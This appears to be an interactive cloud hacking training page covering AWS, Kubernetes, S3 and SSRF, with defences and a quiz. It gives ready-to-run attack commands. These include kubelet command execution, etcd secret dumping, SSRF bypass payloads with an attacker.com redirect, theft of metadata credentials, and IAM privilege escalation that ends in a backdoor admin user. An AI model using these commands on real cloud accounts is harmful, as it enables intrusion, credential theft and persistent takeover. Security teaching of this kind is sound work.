← Back to Vault

Cloud Security & Hacking Lab

Master AWS, Azure, GCP & Kubernetes Security Testing

Progress: 0% - 0 XP / 80 XP

Cloud Security & Hacking Overview

Welcome to the Cloud Security & Hacking Lab, where you'll learn offensive security techniques for cloud environments including AWS, Azure, GCP, and Kubernetes.

What You'll Master:

  • Cloud Vulnerability Scanning: Identify security flaws in containers and cloud infrastructure
  • Kubernetes Security: Exploit misconfigurations in orchestration platforms
  • S3 Bucket Discovery: Find and exploit exposed AWS storage
  • AWS Enumeration: Discover accounts, IAM roles, and credentials
  • Privilege Escalation: Elevate permissions in cloud environments
  • SSRF Attacks: Exploit metadata services for credential theft
Learning Objectives:
By completing this lab, you will understand cloud attack surfaces, enumeration techniques, privilege escalation paths, and defensive countermeasures.
Ethical Notice:
The techniques demonstrated here are for educational purposes and authorized security testing only. Unauthorized access to cloud resources is illegal.

Cloud Security Shared Responsibility Model

Cloud Provider Responsibility
Physical security, infrastructure, hypervisor, network isolation
Customer Responsibility
OS security, application security, data encryption, IAM, network config
Common Attack Surface
Misconfigurations, exposed credentials, overprivileged IAM, public storage

Cloud Platforms

AWS Amazon Web Services

Market leader with EC2, S3, IAM, Lambda. Common targets: metadata service (169.254.169.254), exposed S3 buckets, IAM misconfigurations.

Azure Microsoft Azure

Enterprise-focused platform with VMs, Blob Storage, AAD. Targets: IMDS endpoint, storage account keys, managed identities.

GCP Google Cloud Platform

Developer-friendly with Compute Engine, Cloud Storage, IAM. Targets: metadata server, service account keys, storage buckets.

K8s Kubernetes

Container orchestration platform. Targets: etcd, API server, kubelet, exposed dashboards, RBAC misconfigurations.

Cloud Vulnerability Scanning

Identify security vulnerabilities in container images, cloud configurations, and infrastructure as code.

Container Image Scanning Tools

Trivy

By Aqua Security

Comprehensive vulnerability scanner for containers, file systems, and Git repositories. Detects CVEs, misconfigurations, and secrets.

trivy image nginx:latest
trivy fs --security-checks vuln,config .
Clair

By CoreOS/Red Hat

Static analysis of vulnerabilities in container images. Integrates with CI/CD pipelines for automated scanning.

clairctl analyze nginx:latest
clairctl report nginx:latest
Dagda

Open Source

Static analysis of known vulnerabilities, trojans, viruses, and malware in Docker images.

dagda vuln --docker_image nginx:latest
Twistlock

By Palo Alto Networks

Enterprise container security platform with runtime protection, compliance, and vulnerability management.

twistcli images scan nginx:latest
Sysdig

Commercial Platform

Container intelligence and security platform with runtime detection and forensics capabilities.

sysdig-cli-scanner nginx:latest

Interactive Scanner Simulator

$ Waiting for scan command...
Best Practices:
  • Scan images before deployment in CI/CD pipelines
  • Use minimal base images (Alpine, Distroless) to reduce attack surface
  • Regularly update base images and dependencies
  • Implement image signing and verification
  • Monitor runtime behavior for anomalies

Kubernetes Security

Understand Kubernetes architecture and common attack vectors for penetration testing.

Kubernetes Architecture & Attack Surfaces

Master Node
Control Plane
API Server :6443
etcd :2379
Scheduler
Worker Node 1
Workload Execution
Kubelet :10250
Container Runtime
kube-proxy
Worker Node 2
Workload Execution
Kubelet :10250
Container Runtime
kube-proxy

Key Attack Vectors

1
etcd Enumeration (Port 2379)
Distributed key-value store containing cluster secrets, configurations, and state. If exposed without authentication, attackers can extract credentials and API tokens.
curl http://target:2379/v2/keys/?recursive=true
etcdctl get / --prefix --keys-only
2
API Server Exploitation (Port 6443/8080)
Unauthenticated or weakly authenticated API access allows cluster control. Check for anonymous access and RBAC misconfigurations.
kubectl --insecure-skip-tls-verify get pods
kubectl auth can-i --list
3
Kubelet API (Port 10250)
Node agent that can be exploited for command execution in containers, pod information disclosure, and node compromise.
curl -k https://target:10250/pods
curl -k https://target:10250/run/<namespace>/<pod>/<container> -d "cmd=id"
4
Configuration File Exploitation
Exposed kubeconfig files, service account tokens mounted in pods, and secrets stored insecurely.
cat /var/run/secrets/kubernetes.io/serviceaccount/token
kubectl --token=$TOKEN get secrets

Kubernetes Enumeration Checklist

Enumeration Progress: 0/8 checks completed
Critical Misconfigurations:
  • Anonymous authentication enabled on API server
  • etcd exposed without TLS/authentication
  • Kubelet read-only port (10255) accessible
  • Overly permissive RBAC (cluster-admin to default service accounts)
  • Privileged containers with hostPath or hostNetwork
  • Dashboard exposed without authentication

S3 Bucket Discovery & Exploitation

Learn techniques to discover and exploit misconfigured AWS S3 buckets containing sensitive data.

S3 Bucket Discovery Methods

1. Source Code Analysis

Search application source code, JavaScript files, and mobile apps for hardcoded S3 bucket names and URLs.

grep -r "s3.amazonaws.com" .
grep -r ".s3." *.js
2. Brute Force Discovery

Use wordlists to generate common bucket names based on company names, domains, and common patterns.

s3scanner scan --buckets-file wordlist.txt
./BucketKicker.py wordlist.txt
3. Grayhat Warfare

Search engine for publicly exposed S3 buckets. Search by bucket name, file type, or keywords in content.

https://buckets.grayhatwarfare.com/
Search: company-name backup
4. S3 Inspector

Check bucket permissions, ACLs, and policies for misconfigurations allowing unauthorized access.

aws s3api get-bucket-acl --bucket target
aws s3api get-bucket-policy --bucket target

Interactive S3 Bucket Discovery Simulator

$ S3 bucket discovery simulator ready...

S3 Bucket Naming Patterns

Common patterns to test:
  • company-name, companyname, company_name
  • company-backups, company-logs, company-data
  • company-prod, company-dev, company-staging
  • company-assets, company-uploads, company-files
  • domain.com, www.domain.com, assets.domain.com

Permission Testing

R
READ Permission
List bucket contents and download objects
aws s3 ls s3://bucket-name --no-sign-request
W
WRITE Permission
Upload files to bucket (potential malware hosting)
aws s3 cp test.txt s3://bucket-name/ --no-sign-request
F
FULL_CONTROL Permission
Modify ACLs, delete objects, complete bucket takeover
aws s3api put-bucket-acl --bucket name --acl public-read
Real-World S3 Breaches:
  • Capital One (2019): 100M+ records exposed via SSRF to metadata service
  • Uber (2016): 57M records from publicly accessible S3 bucket
  • Verizon (2017): 14M customer records in unsecured bucket
  • GoDaddy (2019): Multiple buckets with customer data publicly readable

AWS Enumeration

Discover AWS account information, IAM roles, credentials, and cloud infrastructure details.

AWS Account ID Discovery

GitHub Search

Search GitHub for hardcoded credentials, config files, and CloudFormation templates containing account IDs.

site:github.com "company-name" "aws_access_key_id"
site:github.com "company-name" "arn:aws:iam"
Error Messages

Trigger verbose error messages that leak account IDs through invalid ARN references.

aws sts assume-role --role-arn arn:aws:iam::ACCOUNT:role/test
aws s3api get-object --bucket name --key test
AMI Discovery

Public AMIs and snapshots contain owner account IDs in their metadata.

aws ec2 describe-images --owners self
aws ec2 describe-snapshots --owner-ids ACCOUNT
DNS & SSL Certs

CloudFront distributions and ALB DNS names can reveal account information.

dig cloudfront.net ANY
openssl s_client -connect target:443

IAM Role & Credential Discovery

1
Git Repository Mining
Search GitHub, GitLab, Bitbucket for exposed credentials, .env files, and AWS config files.
trufflehog git https://github.com/target/repo
git-secrets --scan
2
Social Engineering
Phishing attacks targeting developers with access to AWS Console or CLI credentials.
3
Password Reuse
Test leaked credentials from public breaches against AWS Console login.
4
SSRF to Metadata Service
Exploit SSRF vulnerabilities to access EC2 metadata service and steal IAM role credentials.
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

EC2 Metadata Service Exploitation

The EC2 metadata service provides instance metadata and temporary IAM credentials. It's accessible from within EC2 instances at a link-local address.

Metadata response will appear here...
IMDSv2 Protection:
AWS introduced IMDSv2 (Instance Metadata Service Version 2) which requires a session token obtained via PUT request, mitigating SSRF attacks. Always check both v1 and v2 availability.
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/

Credential Validation

$ Enter credentials to validate...

AWS Privilege Escalation

Techniques to elevate privileges from limited IAM permissions to administrator access.

Privilege Escalation Path Visualizer

Level 1: Initial Access (Low Privilege)

Permissions: ec2:DescribeInstances, s3:ListBucket (Read-only)

Goal: Enumerate environment and identify escalation vectors

aws sts get-caller-identity
aws iam get-user
aws iam list-attached-user-policies --user-name username

Level 2: EC2 Instance with Existing Profile

Required Permissions: iam:PassRole + ec2:RunInstances

Technique: Launch EC2 instance with privileged IAM role attached, then access metadata service to steal credentials.

aws ec2 run-instances \
--image-id ami-12345678 \
--instance-type t2.micro \
--iam-instance-profile Name=AdminRole

# SSH into instance and steal creds:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole

Level 3: Create New Policy Version

Required Permissions: iam:CreatePolicyVersion

Technique: Modify existing policy by creating new version with elevated permissions and setting it as default.

aws iam create-policy-version \
--policy-arn arn:aws:iam::ACCOUNT:policy/LimitedPolicy \
--policy-document file://admin-policy.json \
--set-as-default

# admin-policy.json:
{
"Version": "2012-10-17",
"Statement": [{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}]
}

Level 4: Add User to Admin Group

Required Permissions: iam:AddUserToGroup

Technique: Add current user to existing admin group to inherit administrative permissions.

aws iam list-groups
aws iam get-group --group-name Administrators

aws iam add-user-to-group \
--user-name compromised-user \
--group-name Administrators

# Verify new permissions:
aws iam list-attached-group-policies --group-name Administrators

Level 5: Full Administrator Access

Achieved Permissions: *:* (Full AWS account control)

Impact: Complete account takeover - can create users, access all data, launch resources, modify billing

# Verify admin access:
aws iam list-users
aws s3 ls
aws ec2 describe-instances --region us-east-1

# Create backdoor user:
aws iam create-user --user-name backdoor
aws iam attach-user-policy --user-name backdoor \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name backdoor
✓ PRIVILEGE ESCALATION COMPLETE - Administrator access achieved!

Additional Privilege Escalation Vectors

iam:AttachUserPolicy

Attach administrator policy directly to user account.

aws iam attach-user-policy \
--user-name current-user \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
iam:PutUserPolicy

Create inline policy with elevated permissions.

aws iam put-user-policy \
--user-name current-user \
--policy-name EscPolicy \
--policy-document file://admin.json
iam:UpdateAssumeRolePolicy

Modify role trust policy to allow assuming privileged role.

aws iam update-assume-role-policy \
--role-name AdminRole \
--policy-document file://trust.json
lambda:CreateFunction + iam:PassRole

Create Lambda with privileged role and execute code.

aws lambda create-function \
--function-name priv-esc \
--role arn:aws:iam::ACCOUNT:role/AdminRole \
--handler index.handler --zip-file fileb://func.zip
Defense Strategies:
  • Principle of Least Privilege: Grant minimum permissions required for job function
  • Permission Boundaries: Set maximum permissions for IAM entities
  • Service Control Policies (SCPs): Restrict dangerous actions at organization level
  • CloudTrail Monitoring: Alert on suspicious IAM modifications
  • Regular Audits: Use IAM Access Analyzer and AWS Config to detect overprivileged roles

SSRF Attack Demonstration

Server-Side Request Forgery (SSRF) allows attackers to make requests from the vulnerable server, often to access internal resources like the EC2 metadata service.

SSRF Attack Chain

1
Identify SSRF Vulnerability
Find user input that triggers server-side HTTP requests (URL parameters, webhooks, image fetching, PDF generation, etc.)
2
Test Internal Network Access
Attempt to access internal IP ranges, localhost, and cloud metadata endpoints
3
Access Metadata Service
Query 169.254.169.254 to retrieve instance metadata and IAM credentials
4
Extract IAM Credentials
Steal temporary access keys from security-credentials endpoint
5
Use Credentials for AWS Access
Configure AWS CLI with stolen credentials and access cloud resources

Interactive SSRF Simulator

Scenario: A web application has a "Fetch URL" feature that retrieves external content. You suspect it's vulnerable to SSRF.

$ SSRF testing environment ready...

SSRF Bypass Techniques

IP Encoding

Bypass blacklists using alternative IP representations.

http://169.254.169.254/ (standard)
http://2852039166/ (decimal)
http://0xa9.0xfe.0xa9.0xfe/ (hex)
http://0251.0376.0251.0376/ (octal)
DNS Rebinding

Use DNS that resolves to internal IP after initial validation.

http://metadata.nicob.net
http://169.254.169.254.nip.io
URL Redirects

Host external page that redirects to metadata service.

http://attacker.com/redirect.php
# Redirects to 169.254.169.254
Protocol Smuggling

Use alternative protocols or URL parsers.

file:///etc/passwd
gopher://169.254.169.254:80/...
dict://169.254.169.254:80/
SSRF Defense Mechanisms:
  • Whitelist Allowed Domains: Only permit requests to known safe destinations
  • Block Private IP Ranges: Deny RFC1918, link-local (169.254.0.0/16), and localhost
  • Disable Redirects: Prevent HTTP redirects that bypass filters
  • Use IMDSv2: Require session tokens for metadata service access
  • Network Segmentation: Isolate web servers from sensitive internal resources
  • Egress Filtering: Control outbound connections from application servers

Real-World SSRF Case: Capital One Breach (2019)

Attack Summary:

Attacker exploited SSRF in web application firewall (WAF) to access EC2 metadata service, stealing IAM credentials. Used credentials to access S3 buckets containing 100+ million customer records.

Attack Steps:
  1. Discovered SSRF in misconfigured WAF
  2. Accessed http://169.254.169.254/latest/meta-data/iam/security-credentials/
  3. Retrieved IAM role temporary credentials
  4. Used credentials to list S3 buckets
  5. Exfiltrated sensitive customer data from multiple buckets
Lessons Learned:
  • Implement strict SSRF protections on all user-controlled URLs
  • Use IMDSv2 to prevent simple SSRF attacks
  • Apply principle of least privilege to IAM roles
  • Monitor for unusual metadata service access patterns
  • Encrypt sensitive data at rest in S3

Cloud Security Testing Tools

Essential tools for AWS penetration testing and security assessment.

Offensive Security Tools

PACU

By Rhino Security Labs

AWS exploitation framework with 40+ modules for enumeration, privilege escalation, persistence, and data exfiltration.

git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu && bash install.sh
python3 pacu.py

# Example usage:
run iam__enum_permissions
run iam__privesc_scan

Key Modules: iam__enum_users, ec2__enum, s3__bucket_finder, lambda__backdoor_function

CloudGOAT 2

By Rhino Security Labs

Vulnerable-by-design AWS environment for learning cloud security. Multiple scenarios covering IAM, EC2, Lambda, and more.

git clone https://github.com/RhinoSecurityLabs/cloudgoat
cd cloudgoat
pip3 install -r requirements.txt
python3 cloudgoat.py config profile
python3 cloudgoat.py create iam_privesc_by_rollback

Scenarios: IAM privilege escalation, Lambda privilege escalation, EC2 SSRF, CodeBuild secrets

AWS-Pwn

Collection of AWS Exploitation Tools

Suite of tools for AWS credential discovery, enumeration, and exploitation from compromised environments.

git clone https://github.com/dagrz/aws_pwn

# Enumerate IAM permissions:
python3 aws_pwn.py --enumerate

# Search for credentials:
python3 aws_pwn.py --find-creds
WeirdAAL

AWS Attack Library

Python library for interacting with AWS services for penetration testing and red team operations.

git clone https://github.com/carnal0wnage/weirdAAL
python3 weirdAAL.py -m recon_all -t target
Prowler

AWS Security Assessment

Security best practices assessment, auditing, and hardening tool following CIS benchmarks.

git clone https://github.com/prowler-cloud/prowler
cd prowler
./prowler -M csv html

# Specific checks:
./prowler -g cislevel2
ScoutSuite

Multi-Cloud Security Auditing

Automated security assessment for AWS, Azure, GCP with detailed HTML reports.

pip install scoutsuite
scout aws --profile target

# Multi-cloud scan:
scout all --profile aws_profile
S3Scanner

S3 Bucket Discovery & Enumeration

Fast tool to find open S3 buckets and dump contents.

pip install s3scanner
s3scanner scan --buckets-file buckets.txt
s3scanner dump --bucket target-bucket
BucketKicker

S3 Brute Force Tool

Dictionary-based S3 bucket discovery with permission testing.

git clone https://github.com/craighays/bucketkicker
python BucketKicker.py wordlist.txt
CloudMapper

AWS Environment Visualization

Creates network diagrams of AWS environments for security analysis.

git clone https://github.com/duo-labs/cloudmapper
python cloudmapper.py configure
python cloudmapper.py collect
python cloudmapper.py prepare
python cloudmapper.py webserver
enumerate-iam

IAM Permission Enumeration

Brute force AWS IAM permissions to understand what actions credentials can perform.

git clone https://github.com/andresriancho/enumerate-iam
python enumerate-iam.py --access-key AKIA... --secret-key ...
Terraform AWS Pwn

Vulnerable Infrastructure Templates

Intentionally vulnerable Terraform configurations for practicing cloud exploitation.

git clone https://github.com/SecurityFTW/terraform-aws-pwn
terraform init
terraform apply
Cloud_Enum

Multi-Cloud Asset Discovery

Enumerate public resources in AWS, Azure, and GCP.

git clone https://github.com/initstring/cloud_enum
python3 cloud_enum.py -k company-name

IAM Policy Analyzer

$ Policy analysis results will appear here...
Tool Selection Guide:
  • Initial Reconnaissance: Prowler, ScoutSuite, Cloud_Enum
  • Credential Discovery: truffleHog, git-secrets, AWS-Pwn
  • Permission Enumeration: enumerate-iam, PACU, WeirdAAL
  • Privilege Escalation: PACU, CloudGOAT 2
  • S3 Bucket Hunting: S3Scanner, BucketKicker, Cloud_Enum
  • Learning & Practice: CloudGOAT 2, Terraform AWS Pwn

Cloud Security Quiz

Test your knowledge of cloud security and hacking techniques. Complete all questions to earn 80 XP!

Question 1: Which tool is specifically designed for AWS exploitation and includes 40+ attack modules?

Question 2: What is the IP address of the AWS EC2 metadata service?

Question 3: Which Kubernetes component stores all cluster secrets and configuration data?

Question 4: Which container scanning tool is developed by Aqua Security?

Question 5: What IAM permissions are required to escalate privileges by launching an EC2 instance with a privileged role?

Question 6: Which AWS feature requires a session token to mitigate SSRF attacks against the metadata service?

Question 7: What is the default port for the Kubernetes API server?

Question 8: Which tool can be used to brute force S3 bucket names?

Question 9: CloudGOAT 2 is used for:

Question 10: Which IAM permission allows an attacker to modify an existing policy by creating a new version?

Question 11: What type of attack was used in the Capital One breach to access the metadata service?

Question 12: In the Cloud Shared Responsibility Model, who is responsible for IAM configuration?